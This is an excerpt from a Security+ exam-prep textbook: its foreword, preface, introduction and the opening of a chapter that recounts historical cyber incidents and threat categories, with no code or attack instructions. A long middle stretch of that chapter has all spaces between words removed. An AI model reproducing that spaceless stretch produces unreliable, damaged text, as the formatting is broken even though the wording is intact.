In the final analysis, security is really all about risk management. What is your organization's appetite for risk and how is that risk managed? The chapters covering risk management lead the reader through these less technical issues to gain an understanding of how these impact the organization. Baselines and change management are essential to understanding what assets are being secured and how they are being changed. A reader who learns these skills well will be able to work in incident response, disaster recovery, and business continuity. Understanding these processes and how they work with technical issues expands career opportunities.
The authors conclude their review of the principles of computer security with an examination of privacy, legal issues, and ethics. Although these topics appear at the end of the book, they are crucial issues in the modern world. Remember, as a computer security practitioner, you will have legal access to more data and information than anyone else in the organization.
Although not the last chapter in the book, I have decided to comment on forensics last. The authors have done a wonderful job of addressing this complex topic. But why mention it last? Because many times forensics is what one does after computer security fails. It makes a good epitaph for a wonderful book.
Tonight it is 15 degrees and snowing outside while I sit in my study—warm, dry, and comfortable; my home is my castle. Not bad for mid-winter in Idaho; however, I should not forget that one reason I am comfortable is because certified computer security practitioners are protecting my information and privacy as well as the critical infrastructure that supports it.
For Instructors
I have taught from prior editions of this book and have used its companion laboratory manual for several years. Both Principles of Computer Security, Fourth Edition and Principles of Computer Security Lab Manual, Fourth Edition have instructor materials on a companion Web site available to adopting instructors. Instructor manuals, including the answers to the end-of-chapter questions, PowerPoint slides, and the test bank of questions for use as quizzes or exams, make preparation a snap.
Corey D. Schou, PhD
Series Editor
University Professor of Informatics
Professor of Computer Science
Director of the National Information Assurance Training and Education Center
Idaho State University
PREFACE
Information and computer security has moved from the confines of academia to mainstream America in the 21st century. Data breaches, information disclosures, and high-profile hacks involving the theft of information and intellectual property seem to be a regular staple of the news. It has become increasingly obvious to everybody that something needs to be done to secure not only our nation's critical infrastructure but also the businesses we deal with on a daily basis. The question is, "Where do we begin?" What can the average information technology professional do to secure the systems that he or she is hired to maintain? One immediate answer is education and training. If we want to secure our computer systems and networks, we need to know how to do this and what security entails.
Our way of life, from commerce to messaging to business communications and even social media, depends on the proper functioning of our worldwide infrastructure. A common thread throughout all of these, however, is technology—especially technology related to computers and communication. Thus, an individual, organization, or nation who wanted to cause damage to this nation could attack it not just with traditional weapons but with computers through the Internet. Complacency is not an option in today's hostile network environment. The protection of our networks and systems is not the sole domain of the information security professional, but rather the responsibility of all who are involved in the design, development, deployment, and operation of the systems that are nearly ubiquitous in our daily lives. With virtually every system we depend upon daily at risk, the attack surface and corresponding risk profile is extremely large. Information security has matured from a series of technical issues to a comprehensive risk management problem, and this book provides the foundational material to engage in the field in a professional manner.
So, where do you, the IT professional seeking more knowledge on security, start your studies? This book offers a comprehensive review of the underlying foundations and technologies associated with securing our systems and networks. The IT world is overflowing with certifications that can be obtained by those attempting to learn more about their chosen profession. The information security sector is no different, and the CompTIA Security+ exam offers a basic level of certification for security. In the pages of this book you will find not only material that can help you prepare for taking the CompTIA Security+ exam but also the basic information that you will need in order to understand the issues involved in securing your computer systems and networks today. In no way is this book the final source for learning all about protecting your organization's systems, but it serves as a point from which to launch your security studies and career.
One thing is certainly true about this field of study—it never gets boring. It constantly changes as technology itself advances. Something else you will find as you progress in your security studies is that no matter how much technology advances and no matter how many new security devices are developed, at its most basic level, the human is still the weak link in the security chain. If you are looking for an exciting area to delve into, then you have certainly chosen wisely. Security offers a challenging blend of technology and people issues. And securing the systems of tomorrow will require everyone to work together, not just security, but developers, operators, and users alike. We, the authors of this book, wish you luck as you embark on an exciting and challenging career path.
Wm. Arthur Conklin, Ph.D.
Gregory B. White, Ph.D.
INTRODUCTION
Computer security is becoming increasingly important today as the number of security incidents steadily climbs. Many corporations are now spending significant portions of their budgets on security hardware, software, services, and personnel. They are spending this money not because it increases sales or enhances the product they provide, but because of the possible consequences should they not take protective actions. Security has become a comprehensive risk management exercise in firms that take the risks seriously.
Why Focus on Security?
Security is not something that we want to have to pay for; it would be nice if we didn't have to worry about protecting our data from disclosure, modification, or destruction from unauthorized individuals, but that is not the environment we find ourselves in today. Instead, we have seen the cost of recovering from security incidents steadily rise along with the rise in the number of incidents themselves. Since hackers have learned how to monetize hacks, the playing field has become significantly more dangerous. There are now incentives for a professional class of hacker with the intent of reaping benefits both long and short term. With the advent of advanced persistent threats, the rise of nation-state hacking, and the increase in criminal activity from botnets to ransomware, the IT playing field is now viewed as a contested environment, one where hacking can result in gains. Law enforcement is too overwhelmed and under-resourced to make a dent in the problem, and the result is a need for trained security practitioners in all business segments—and a further need for security-aware IT personnel in regular IT positions. Security has become a mainstream topic.
A Growing Need for Security Specialists
To protect our computer systems and networks, we will need a significant number of new security professionals trained in the many aspects of computer and network security. This is not an easy task, as the systems connected to the Internet become increasingly complex, with software whose lines of code number in the millions. Understanding why this is such a difficult problem to solve is not hard if you consider how many errors might be present in a piece of software that is several million lines long. When you add the additional factor of how fast software is being developed—from necessity as the market is constantly moving—understanding how errors occur is easy. Not every "bug" in the software will result in a security hole, but it doesn't take many to affect the Internet community drastically. We can't just blame the vendors for this situation, because they are reacting to the demands of government and industry. Most vendors are fairly adept at developing patches for flaws found in their software, and patches are constantly issued to protect systems from bugs that may introduce security problems. This introduces a whole new problem for managers and administrators—patch management. How important this has become is easily illustrated by how many of the most recent security events have occurred as a result of a security bug for which a patch was available months prior to the security incident; members of the community had not correctly installed the patch, however, thus making the incident possible. One of the reasons this happens is that many of the individuals responsible for installing the patches are not trained to understand the security implications surrounding the hole or the ramifications of not installing the patch. Many of these individuals simply lack the necessary training.
Because of the need for an increasing number of security professionals who are trained to some minimum level of understanding, certifications such as the CompTIA Security+ have been developed. Prospective employers want to know that the individual they are considering hiring knows what to do in terms of security. The prospective employee, in turn, wants to have a way to demonstrate his or her level of understanding, which can enhance the candidate's chances of being hired. The community as a whole simply wants more trained security professionals.
Preparing Yourself for the CompTIA Security+ Exam
Principles of Computer Security, Fourth Edition is designed to help prepare you to take the CompTIA Security+ certification exam. When you pass it, you will demonstrate you have that basic understanding of security that employers are looking for. Passing this certification exam will not be an easy task, for you will need to learn many things to acquire that basic understanding of computer and network security.
How This Book Is Organized
The book is divided into chapters to correspond with the objectives of the exam itself. Some of the chapters are more technical than others—reflecting the nature of the security environment where you will be forced to deal with not only technical details but also other issues such as security policies and procedures as well as training and education. Although many individuals involved in computer and network security have advanced degrees in math, computer science, information systems, or computer or electrical engineering, you do not need this technical background to address security effectively in your organization. You do not need to develop your own cryptographic algorithm, for example; you simply need to be able to understand how cryptography is used, along with its strengths and weaknesses. As you progress in your studies, you will learn that many security problems are caused by the human element. The best technology in the world still ends up being placed in an environment where humans have the opportunity to foul things up—and all too often do.
Onward and Upward
At this point, we hope that you are now excited about the topic of security, even if you weren't in the first place. We wish you luck in your endeavors and welcome you to the exciting field of computer and network security.
INSTRUCTOR WEBSITE
For instructor resources, visit www.mhprofessional.com/PrinciplesSecurity4e. Adopting teachers can access the support materials identified below. Contact your McGraw-Hill Education sales representative for details on how to access the materials.
Instructor Materials
The Principles of Computer Security companion Web site (www.mhprofessional.com/PrinciplesSecurity4e) provides many resources for instructors:
Answer keys to the end-of-chapter activities in the textbook
Answer keys to the lab manual activities (lab manual available separately)
Engaging PowerPoint slides on the lecture topics (including full-color artwork from the book)
An Instructor Manual
Access to test bank files and software that allows you to generate a wide array of paper- or network-based tests, and that features automatic grading
Hundreds of practice questions and a wide variety of question types and difficulty levels, enabling you to customize each test to maximize student progress
Blackboard cartridges and other formats may also be available upon request; contact your sales representative
Chapter 1 Introduction and Security Trends
Security is mostly a superstition. It does not exist in nature, nor do the children of men as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure or nothing.
—HELEN KELLER
In this chapter, you will learn how to
Define computer security
Discuss common threats and recent computer crimes that have been committed
List and discuss recent trends in computer security
Describe common avenues of attacks
Describe approaches to computer security
Discuss the relevant ethical issues associated with computer security
Why should we be concerned about computer and network security? All you have to do is turn on the television or read the newspaper to find out about a variety of security problems that affect our nation and the world today. The danger to computers and networks may seem to pale in comparison to the threat of terrorist strikes, but in fact the average citizen is much more likely to be the target of an attack on their own personal computer, or a computer they use at their place of work, than they are to be the direct victim of a terrorist attack. This chapter will introduce you to a number of issues involved in securing your computers and networks from a variety of threats that may utilize any of a number of different attacks.
TheComputerSecurityProblemFiftyyearsagocompaniesdidnotconductbusinessacrosstheInternet.Onlinebankingandshoppingwereonlydreamsinsciencefictionstories.Today,however,millionsofpeopleperformonlinetransactionseveryday.CompaniesrelyontheInternettooperateandconductbusiness.Vastamountsofmoneyaretransferredvianetworks,intheformofeitherbanktransactionsorsimplecreditcardpurchases.Wherevertherearevast
amountsofmoney,therearethosewhowilltrytotakeadvantageoftheenvironmenttoconductfraudortheft.Therearemanydifferentwaystoattackcomputersandnetworkstotakeadvantageofwhathasmadeshopping,banking,investment,andleisurepursuitsasimplematterof“draggingandclicking”(ortapping)formanypeople.Identitytheftissocommontodaythatmosteveryoneknowssomebodywho’sbeenavictimofsuchacrime,iftheyhaven’tbeenavictimthemselves.ThisisjustonetypeofcriminalactivitythatcanbeconductedusingtheInternet.Therearemanyothersandallareontherise.
DefinitionofComputerSecurityComputersecurityisnotasimpleconcepttodefine,andhasnumerouscomplexitiesassociatedwithit.Ifoneisreferringtoacomputer,thenitcanbeconsideredsecurewhenthecomputerdoeswhatitissupposedtodoandonlywhatitissupposedtodo.Butaswasnotedearlier,thesecurityemphasishasshiftedfromthecomputertotheinformationbeingprocessed.Informationsecurityisdefinedbytheinformationbeingprotectedfromunauthorizedaccessoralterationandyetisavailabletoauthorizedindividualswhenrequired.Whenonebeginsconsideringtheaspectsofinformation,itisimportanttorealizethatinformationisstored,processed,andtransferredbetweenmachines,andallofthesedifferentstatesrequireappropriateprotectionschemes.Informationassuranceisatermusedtodescribenotjusttheprotectionofinformation,butameansofknowingthelevelofprotectionthathasbeenaccomplished.
TechTip
HistoricalComputerSecurityComputersecurityisanever-changingissue.Fiftyyearsago,computersecuritywasmainlyconcernedwiththephysicaldevicesthatmadeupthecomputer.Atthetime,computerswerethehigh-valueitemsthatorganizationscouldnotaffordtolose.Today,computerequipmentisinexpensivecomparedtothevalueofthedataprocessedbythecomputer.Nowthehigh-value
itemisnotthemachine,buttheinformationthatitstoresandprocesses.Thishasfundamentallychangedthefocusofcomputersecurityfromwhatitwasintheearlyyears.Todaythedatastoredandprocessedbycomputersisalmostalwaysmorevaluablethanthehardware.
Computersecurityandinformationsecuritybothrefertoastatewherethehardwareandsoftwareperformonlydesiredactionsandtheinformationisprotectedfromunauthorizedaccessoralterationandisavailabletoauthorizeduserswhenrequired.
HistoricalSecurityIncidentsByexaminingsomeofthecomputer-relatedcrimesthathavebeencommittedoverthelast30orsoyears,wecanbetterunderstandthethreatsandsecurityissuesthatsurroundourcomputersystemsandnetworks.Electroniccrimecantakeanumberofdifferentforms,buttheoneswewillexamineherefallintotwobasiccategories:crimesinwhichthecomputerwasthetarget,andincidentsinwhichacomputerwasusedtoperpetratetheact(forexample,therearemanydifferentwaystoconductbankfraud,oneofwhichusescomputerstoaccesstherecordsthatbanksprocessandmaintain).Wewillstartourtourofcomputercrimeswiththe1988Internetworm
(Morrisworm),oneofthefirstrealInternetcrimecases.Priorto1988,criminalactivitywaschieflycenteredonunauthorizedaccesstocomputersystemsandnetworksownedbythetelephonecompanyandcompaniesthatprovideddial-upaccessforauthorizedusers.Virusactivityalsoexistedpriorto1988,havingstartedintheearly1980s.
TheMorrisWorm(November1988)RobertMorris,thenagraduatestudentatCornellUniversity,releasedwhathasbecomeknownastheInternetworm(ortheMorrisworm).Theworminfectedroughly10percentofthemachinesthenconnectedtotheInternet
(whichamountedtoapproximately6000infectedmachines).Thewormcarriednomaliciouspayload,theprogrambeingobviouslya“workinprogress,”butitdidwreakhavocbecauseitcontinuallyre-infectedcomputersystemsuntiltheycouldnolongerrunanyprograms.
CitibankandVladimirLevin(June–October1994)StartingaboutJuneof1994andcontinuinguntilatleastOctoberofthesameyear,anumberofbanktransfersweremadebyVladimirLevinofSt.Petersburg,Russia.Bythetimeheandhisaccompliceswerecaught,theyhadtransferredanestimated$10million.Eventuallyallbutabout$400,000wasrecovered.Levinreportedlyaccomplishedthebreak-insbydialingintoCitibank’scashmanagementsystem.Thissystemallowedclientstoinitiatetheirownfundtransferstootherbanks.
KevinMitnick(February1995)KevinMitnick’scomputeractivitiesoccurredoveranumberofyearsduringthe1980sand1990s.Arrestedin1995,heeventuallypledguiltytofourcountsofwirefraud,twocountsofcomputerfraud,andonecountofillegallyinterceptingawirecommunicationandwassentencedto46monthsinjail.Inthepleaagreement,MitnickadmittedtohavinggainedunauthorizedaccesstoanumberofdifferentcomputersystemsbelongingtocompaniessuchasMotorola,Novell,Fujitsu,andSunMicrosystems.Hedescribedusinganumberofdifferent“tools”andtechniques,includingsocialengineering,sniffers,andclonedcellulartelephones.
TechTip
IntellectualCuriosityIntheearlydaysofcomputercrime,muchofthecriminalactivitycenteredongainingunauthorizedaccesstocomputersystems.Inmanyearlycases,theperpetratorofthecrimedidnotintendtocauseanydamagetothecomputerbutwasinsteadonaquestof“intellectualcuriosity”—tryingtolearnmoreaboutcomputersandnetworks.Todaytheubiquitousnatureofcomputersandnetworkshaseliminatedtheperceivedneedfor
individualstobreakintocomputerstolearnmoreaboutthem.Whiletherearestillthosewhodabbleinhackingfortheintellectualchallenge,itismorecommontodayfortheintellectualcuriositytobereplacedbymaliciousintent.Whateverthereason,todayitisconsideredunacceptable(andillegal)togainunauthorizedaccesstocomputersystemsandnetworks.
OmegaEngineeringandTimothyLloyd(July1996)OnJuly30,1996,asoftware“timebomb”wentoffatOmegaEngineering,aNewJersey–basedmanufacturerofhigh-techmeasurementandcontrolinstruments.Twentydaysearlier,TimothyLloyd,acomputernetworkprogramdesigner,hadbeendismissedfromthecompanyafteraperiodofgrowingtensionbetweenLloydandmanagementatOmega.TheprogramthatranonJuly30deletedallofthedesignandproductionprogramsforthecompany,severelydamagingthesmallfirmandforcingthelayoffof80employees.TheprogramwaseventuallytracedbacktoLloyd,whohadleftitinretaliationforhisdismissal.
WorcesterAirportand“Jester”(March1997)InMarchof1997,telephoneservicestotheFAAcontroltoweraswellastheemergencyservicesattheWorcesterAirportandthecommunityofRutland,Massachusetts,werecutoffforaperiodofsixhours.Thisdisruptionoccurredasaresultofanattackonthephonenetworkbyateenagecomputer“hacker”whowentbythename“Jester.”
TheMelissaVirus(March1999)Melissaisthebestknownoftheearlymacro-typevirusesthatattachthemselvestodocumentsforprogramsthathavelimitedmacroprogrammingcapability.Thevirus,writtenandreleasedbyDavidSmith,infectedaboutamillioncomputersandcausedanestimated$80millionindamages.
TechTip
SpeedofVirusProliferationThespeedatwhichtheSlammerwormspreadservedasawakeupcalltosecurityprofessionals.ItdrovehomethepointthattheInternetcouldbeadverselyimpactedinamatterofminutes.Thisinturncausedanumberofprofessionalstorethinkhowpreparedtheyneededtobeinordertorespondtovirusoutbreaksinthefuture.Agoodfirststepistoapplypatchestosystemsandsoftwareassoonaspossible.Thiswillofteneliminatethevulnerabilitiesthatthewormsandvirusesaredesignedtotarget.
TheLoveLetterVirus(May2000)Alsoknownasthe“ILOVEYOU”wormandthe“LoveBug,”theLoveLetterviruswaswrittenandreleasedbyaPhilippinestudentnamedOneldeGuzman.Theviruswasspreadviae-mailwiththesubjectlineof“ILOVEYOU.”Estimatesofthenumberofinfectedmachinesworldwidehavebeenashighas45million,accompaniedbyapossible$10billionindamages(itshouldbenotedthatfiguresliketheseareextremelyhardtoverifyorcalculate).
TheCodeRedWorm(2001)OnJuly19,2001,inaperiodof14hours,over350,000computersconnectedtotheInternetwereinfectedbytheCodeRedworm.Thecostestimateforhowmuchdamagethewormcaused(includingvariationsofthewormreleasedonlaterdates)exceeded$2.5billion.Thevulnerabilitywasabuffer-overflowconditioninMicrosoft’sIISwebservers,hadbeenknownforamonth.
TheSlammerWorm(2003)OnSaturday,January25,2003,theSlammerwormwasreleased.Itexploitedabuffer-overflowvulnerabilityincomputersrunningMicrosoftSQLServerorSQLServerDesktopEngine.LikethevulnerabilityinCodeRed,thisweaknesswasnotnewand,infact,hadbeendiscoveredandapatchreleasedinJulyof2002.Withinthefirst24hoursofSlammer’srelease,thewormhadinfectedatleast120,000hostsandcausednetwork
outagesandthedisruptionofairlineflights,elections,andATMs.Atitspeak,Slammer-infectedhostsweregeneratingareported1TBofworm-relatedtrafficeverysecond.Thewormdoubleditsnumberofinfectedhostsevery8seconds.Itisestimatedthatittooklessthan10minutestoreachglobalproportionsandinfect90percentofthepossiblehostsitcouldinfect.
WebsiteDefacements(2006)InMayof2006,aTurkishhackerusingthehandleiSKORPiTXsuccessfullyhackedover21,000websitesinasingleeffort.Therationaleforhisactionswasneverdetermined,andoverthenextfewyearshehackedhundredsofthousandsofwebsites,defacingtheircoverpagewithastatementofhishack.Anuisancetosome,thoseaffectedhadtocleanuptheirsystems,includingrepairingvulnerabilities,orhewouldstrikeagain.
Cyberwar?(2007)InMayof2007,thecountryofEstoniawascrippledbyamassivedenial-of-service(DoS)cyberattackagainstallofitsinfrastructure,firms(banks),andgovernmentoffices.ThisattackwastracedtoIPaddressesinRussia,butwasneverclearlyattributedtoagovernment-sanctionedeffort.
OperationBotRoast(2007)In2007,theFBIannouncedthatithadconductedOperationBotRoast,identifyingover1millionbotnetcrimevictims.Intheprocessofdismantlingthebotnets,theFBIarrestedseveralbotnetoperatorsacrosstheUnitedStates.Althoughseeminglyabigsuccess,thiseffortmadeonlyasmalldentinthevastvolumeofbotnetsinoperation.
Conficker(2008–2009)Inlate2008andearly2009,securityexpertsbecamealarmedwhenitwasdiscoveredthatmillionsofsystemsattachedtotheInternetwereinfectedwiththeDownadupworm.AlsoknownasConficker,thewormwas
believedtohaveoriginatedinUkraine.Infectedsystemswerenotinitiallydamagedbeyondhavingtheirantivirussolutionupdatesblocked.Whatalarmedexpertswasthefactthatinfectedsystemscouldbeusedinasecondaryattackonothersystemsornetworks.Eachoftheseinfectedsystemswaspartofwhatisknownasabotnetwork(orbotnet)andcouldbeusedtocauseaDoSattackonatargetorbeusedfortheforwardingofspame-mailtomillionsofusers.
U.S.ElectricPowerGrid(2009)InApril2009,HomelandSecuritySecretaryJanetNapolitanotoldreportersthattheUnitedStateswasawareofattemptsbybothRussiaandChinatobreakintotheU.S.electricpowergrid,mapitout,andplantdestructiveprogramsthatcouldbeactivatedatalaterdate.Sheindicatedthattheseattackswerenotnewandhadinfactbeengoingonforyears.OnearticleintheKansasCityStar,forexample,reportedthatin1997thelocalpowercompany,KansasCityPowerandLight,encounteredperhaps10,000attacksfortheentireyear.By2009thecompanyexperienced30–60millionattacks.
TryThis!SoftwarePatchesOneofthemosteffectivemeasuressecurityprofessionalscantaketoaddressattacksontheircomputersystemsandnetworksistoensurethatallsoftwareisuptodateintermsofvendor-releasedpatches.Manyoftheoutbreaksofvirusesandwormswouldhavebeenmuchlesssevereifeverybodyhadappliedsecurityupdatesandpatcheswhentheywerereleased.Fortheoperatingsystemthatyouuse,gotoyourfavoritewebbrowsertofindwhatpatchesexistfortheoperatingsystemandwhatvulnerabilitiesorissuesthepatcheswerecreatedtoaddress.
FiberCableCut(2009)OnApril9,2009,awidespreadphoneandInternetoutagehittheSanJoseareainCalifornia.Thisoutagewasnottheresultofagroupofdeterminedhackersgainingunauthorizedaccesstothecomputersthatoperatethese
networks,butinsteadoccurredasaresultofseveralintentionalcutsinthephysicalcablesthatcarrythesignals.Thecutsresultedinalossofalltelephone,cellphone,andInternetserviceforthousandsofusersintheSanJosearea.Emergencyservicessuchas911werealsoaffected,whichcouldhavehadsevereconsequences.
TheCurrentThreatEnvironmentThethreatsofthepastweresmaller,targeted,andinmanycasesonlyanuisance.Astimehasgoneon,moreorganizedelementsofcybercrimehaveenteredthepicturealongwithnation-states.From2009andbeyond,thecyberthreatlandscapebecameconsiderablymoredangerous,withnewadversariesouttoperformoneoftwofunctions:denyyoutheuseofyourcomputersystems,oruseyoursystemsforfinancialgainincludingtheftofintellectualpropertyorfinancialinformationincludingpersonallyidentifiableinformation.
AdvancedPersistentThreatsAlthoughtherearenumerousclaimsastowhenadvancedpersistentthreats(APTs)beganandwhofirstcoinedtheterm,theimportantissueistonotethatAPTsrepresentanewbreedofattackpattern.Althoughspecificdefinitionsvary,thethreewordsthatcomprisethetermprovidethekeyelements:advanced,persistent,andthreat.Advancedreferstotheuseofadvancedtechniques,suchasspearphishing,asavectorintoatarget.Persistentreferstotheattacker’sgoalofestablishingalong-term,hiddenpositiononasystem.ManyAPTscangoonforyearswithoutbeingnoticed.Threatreferstotheotherobjective:exploitation.IfanadversaryinveststheresourcestoachieveanAPTattack,theyaredoingitforsomeformoflong-termadvantage.APTsarenotaspecifictypeofattack,butratherthenewmeansbywhichhighlyresourcedadversariestargetsystems.
GhostNet(2009)
In2009,theDalaiLama’sofficecontactedsecurityexpertstodetermineifitwasbeingbugged.Theinvestigationrevealeditwas,andthespyringthatwasdiscoveredwaseventuallyshowntobespyingonover100countries’sensitivemissionsworldwide.ResearchersgavethisAPT-stylespynetworkthenameGhostNet,andalthoughtheeffortwastracedbacktoChina,fullattributionwasneverdetermined.
OperationAurora(2009)OperationAurorawasanAPTattackfirstreportedbyGoogle,butalsotargetingAdobe,Yahoo,JuniperNetworks,Rackspace,Symantec,andseveralmajorU.S.financialandindustrialfirms.ResearchanalysispointedtothePeople’sLiberationArmy(PLA)ofChinaasthesponsor.Theattackranformostof2009andoperatedonalargescale,withthegroupsbehindtheattackconsistingofhundredsofhackersworkingtogetheragainstthevictimfirms.
Stuxnet,Duqu,andFlame(2009–2012)Stuxnet,Duqu,andFlamerepresentexamplesofstate-sponsoredmalware.StuxnetwasamaliciouswormdesignedtoinfiltratetheIranianuraniumenrichmentprogram,tomodifytheequipmentandcausethesystemstofailinordertoachievedesiredresultsandinsomecasesevendestroytheequipment.StuxnetwasdesignedtoattackaspecificmodelofSiemensprogrammablelogiccontroller(PLC),whichwasoneofthecluespointingtoitsobjective,themodificationoftheuraniumcentrifuges.AlthoughneithertheUnitedStatesnorIsraelhasadmittedtoparticipatingintheattack,bothhavebeensuggestedtohavehadaroleinit.Duqu(2011)isapieceofmalwarethatappearstobeafollow-onof
Stuxnet,andhasmanyofthesametargets,butratherthanbeingdestructiveinnature,Duquisdesignedtostealinformation.Themalwareusescommandandcontrolserversacrosstheglobetocollectelementssuchaskeystrokesandsysteminformationfrommachinesanddeliverthemtounknownparties.
Flame(2012)isanotherpieceofmodularmalwarethatmaybeaderivativeofStuxnet.Flameisaninformationcollectionthreat,collectingkeystrokes,screenshots,andnetworktraffic.ItcanrecordSkypecallsandaudiosignalsonamachine.Flameisalargepieceofmalwarewithmanyspecificmodules,includingakillswitchandameansofevadingantivirusdetection.BecauseoftheopennatureofStuxnet—itssourcecodeiswidely
availableontheInternet—itisimpossibletoknowwhoisbehindDuquandFlame.Infact,althoughDuquandFlamewerediscoveredafterStuxnet,thereisgrowingevidencethattheywerepresentbeforeStuxnetandcollectedcriticalintelligenceneededtoconductthelaterattack.Therealstorybehindthesemalwareitemsisthattheydemonstratethepowerandcapabilityofnation-statemalware.
Sony(2011)ThehackergroupLulzSecreportedlyhackedSony,stealingover70millionuseraccounts.Theresultingoutagelasted23days,andcostSonyinexcessof$170million.OneofthebiggestissuesrelatedtotheattackwasSony’spoorresponse,takingmorethanaweektonotifypeopleoftheinitialattack,andthencommunicatingpoorlywithitsuserbaseduringtherecoveryperiod.AlsonotablewasthatalthoughthecreditcarddatawasencryptedonSony’sservers,therestofthedatastolenwasnot,makingiteasypickingsforthedisclosureofinformation.
SaudiAramco(Shamoon)(2012)InAugustof2012,30,000computerswereshutdowninresponsetoamalwareattack(namedShamoon)atSaudiAramco,anoilfirminSaudiArabia.Theattackhitthreeoutoffourmachinesinthefirm,andthedamageincludeddatawipingofmachinesandtheuploadingofsensitiveinformationtoPastebin.Ittook10daysforthefirmtocleanuptheinfectionandrestartitsbusinessnetwork.
DataBreaches(2013–present)Fromtheendof2013throughtothetimeofthiswriting,databreacheshavedominatedthesecuritylandscape.TargetCorporationannounceditsbreachinmid-December,2013,statingthatthehackbeganasearlyas“BlackFriday”(November29)andcontinuedthroughDecember15.Datathievescapturednames,addresses,anddebitandcreditcarddetails,includingnumbers,expirationdates,andCVVcodes.Intheendatotalof70millionaccountswereexposed.FollowingtheTargetbreach,HomeDepotsufferedabreachofover50milliondebitandcreditcardnumbersin2014.JPMorganChasealsohadamajordatabreachin2014,announcingthe
lossof77millionaccountholders’information.UnlikeTargetandHomeDepot,JPMorganChasedidnotloseaccountnumbersorothercrucialdataelements.JPMorganChasealsomountedamajorPRcampaigntoutingitssecurityprogramandspendinginordertosatisfycustomersandregulatorsofitsdiligence.Attheendof2014,SonyPicturesEntertainmentannouncedthatithad
beenhacked,withamassivereleaseofinternaldata.Atthetimeofthiswriting,hackershaveclaimedtohavestolenasmuchas100terabytesofdata,includinge-mails,financialdocuments,intellectualproperty,personaldata,HRinformation…inessence,almosteverything.AdditionalreportsindicatethedestructionofdatawithinSony;althoughtheextentofthedamageisnotknown,atleastoneoftheelementsofmalwareassociatedwiththeattackisknownfordestroyingtheMasterBootRecord(MBR)ofdrives.AttributionintheSonyattackisalsotricky,astheU.S.governmenthasaccusedNorthKorea,whileothergroupshaveclaimedresponsibility,andsomeinvestigatorsclaimitwasaninsidejob.Itmaytakeyearstodeterminecorrectattribution,ifitisevenpossible.
Nation-State Hacking (2013–present) Nation-states have become a recognized issue in security, from the Great Firewall of China to modern malware attacks from a wide range of governments. Threat intelligence became more than a buzzword in 2014 as firms such as CrowdStrike exposed sophisticated hacking actors in China, Russia, and other countries. In 2014 CrowdStrike reported on 39 different threat actors, including criminals, hacktivists, state-sponsored groups, and nation-states. Learning how these adversaries act provides valuable clues to their detection in the enterprise. Groups such as China's Hurricane Panda represent a real security threat. Hurricane Panda focuses on aerospace firms and Internet service companies. Not all threats are from China. Russia is credited with its own share of malware. Attribution is difficult, and sometimes the only hints are circumstantial clues, such as the operating-hours timelines of the command-and-control servers used by Energetic Bear (also known as Dragonfly), a group that attacked the energy industry in Europe. The Regin platform, a complete malware platform possibly in operation for over a decade, has been shown to attack telecom operators, financial institutions, government agencies, and political bodies. Regin is interesting because of its stealth, its complexity, and its ability to hide its command-and-control network from investigators. Although highly suspected to be deployed by a nation-state, its attribution remains unsolved.

In 2015, data breaches and nation-state hacking hit new highs with the loss of over 20 million sensitive personnel files from the computers at the U.S. Office of Personnel Management (OPM). This OPM loss, reportedly to China, was extremely damaging in that the data lost consisted of the complete background investigations on people who had applied for security clearances. These records detailed extensive personal information on the applicants and their family members, providing an adversary with detailed intelligence. In the same year it was reported that e-mail systems in the Department of State, the Department of Defense, and the White House had been compromised, possibly by both Russia and China. The sensitive nuclear negotiations in Switzerland between the U.S., its allies, and Iran were also reported to have been subject to electronic eavesdropping by parties yet unknown.
Operation Night Dragon was a name given to an intellectual property attack executed against oil, gas, and petrochemical companies in the United States. Using a set of global servers, attackers from China raided global energy companies for proprietary and highly confidential information such as bidding data for leases. The attack shed new light on what constitutes critical data and the associated risks.
Threats to Security

The incidents described in the previous sections provide a glimpse into the many different threats that face administrators as they attempt to protect their computer systems and networks. There are, of course, the normal natural disasters that organizations have faced for years. In today's highly networked world, however, new threats have developed that we did not have to worry about 50 years ago. There are a number of ways that we can break down the various threats.

One way to categorize them is to separate threats that come from outside of the organization from those that are internal. Another is to look at the various levels of sophistication of the attacks, from those by "script kiddies" to those by "elite hackers." A third is to examine the level of organization of the various threats, from unstructured threats to highly structured threats. All of these are valid approaches, and they in fact overlap each other. The following sections examine threats from the perspective of where the attack comes from.
Viruses and Worms

While your organization may be exposed to viruses and worms as a result of employees not following certain practices or procedures, generally you will not have to worry about your employees writing or releasing viruses and worms. It is important to draw a distinction between the writers of malware and those who release malware. Debates over the ethics of writing viruses permeate the industry, but currently, simply writing them is not considered a criminal activity. A virus is like a baseball bat; the bat itself is not evil, but the inappropriate use of the bat (such as to smash a car's window) falls into the category of criminal activity. (Some may argue that this is not a very good analogy since a baseball bat has a useful purpose, to play ball, but viruses have no useful purpose. In general, this is true, but in some limited environments, such as in specialized computer science courses, the study and creation of viruses can be considered a useful learning experience.)
Cross Check

Malware Viruses and worms are just two types of threats that fall under the general heading of malware. The term malware comes from "malicious software," which describes the overall purpose of code that falls into this category of threat. Malware is software that has a nefarious purpose, designed to cause problems to you as an individual (for example, identity theft) or to your system. More information on the different types of malware is provided in Chapter 15.
By number, viruses and worms are the most common problem that an organization faces because literally thousands of them have been created and released. Fortunately, antivirus software and system patching can eliminate the largest portion of this threat. Viruses and worms generally are also nondiscriminating threats; they are released on the Internet in a general fashion and aren't targeted at a specific organization. They typically are also highly visible once released, so they aren't the best tool to use in highly structured attacks where secrecy is vital.
Intruders

The act of deliberately accessing computer systems and networks without authorization is generally referred to as hacking, with individuals who conduct this activity being referred to as hackers. The term hacking also applies to the act of exceeding one's authority in a system. This would include authorized users who attempt to gain access to files they aren't permitted to access or who attempt to obtain permissions that they have not been granted. While the act of breaking into computer systems and networks has been glorified in the media and movies, the physical act does not live up to the Hollywood hype. Intruders are, if nothing else, extremely patient, since the process to gain access to a system takes persistence and dogged determination. The attacker will conduct many pre-attack activities in order to obtain the information needed to determine which attack will most likely be successful. Typically, by the time an attack is launched, the attacker will have gathered enough information to be very confident that the attack will succeed.

